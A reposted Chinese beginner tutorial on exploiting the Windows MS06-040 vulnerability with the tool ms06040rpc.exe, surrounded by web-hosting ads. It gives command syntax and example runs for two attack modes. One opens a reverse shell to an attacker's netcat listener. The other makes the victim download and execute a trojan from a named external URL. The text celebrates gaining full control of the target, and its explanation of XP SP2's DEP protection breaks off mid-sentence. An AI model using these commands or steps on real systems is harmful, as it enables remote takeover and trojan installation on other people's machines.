手机站
网通分站
电信主站
密 码:
用户名:
当前位置 : 主页>网站运营>建站经验>列表

菜鸟玩转溢出之MS06040篇

来源:互联网 作者:west263.com 时间:2008-04-16
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!
such as:http://192.168.0.128/test.exe
<reverse addr>: your host ip address
<reverse port >:your host listenning port
<os type(1/2)>: 1: win 2000sp4 2:win xpsp1

照顾一下小菜,我这说明一下
方法一:
命令:ms06040rpc.exe
攻击的IP 您的IP 反弹端口 系统类型
系统类型:“1就是win 2000sp4
2就是winxpsp1
举例:ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
方法二
命令:ms06040rpc.exe 您的木马地址系统类型
举例:ms06040rpc.exe
192.168.209.128 http://www.hackbase.com/muma.exe 1
溢出成功后就自动下载http://www.hackbase.com/muma.exe 并且执行


我们这输入ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
192.168.209.128
就是我要攻击的IP192.168.137.1就是我的IP8888就是我刚才用Nc监听的8888端口


提示发送成功


OK
,我们的得到了一个SHELL,能够随心的控制他了

很多人,包括一些大虾们都弄不懂为什么明明XPSP22003系统明明说了有漏洞可是不能利用
呵呵,告诉大家,其实XPSP2用了DEP技术

因为DEP能够对各种程式进行监控,阻止病毒在受保护的内存位置运行有害代码。DEP通过处理器的NX(No eXecute)

文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!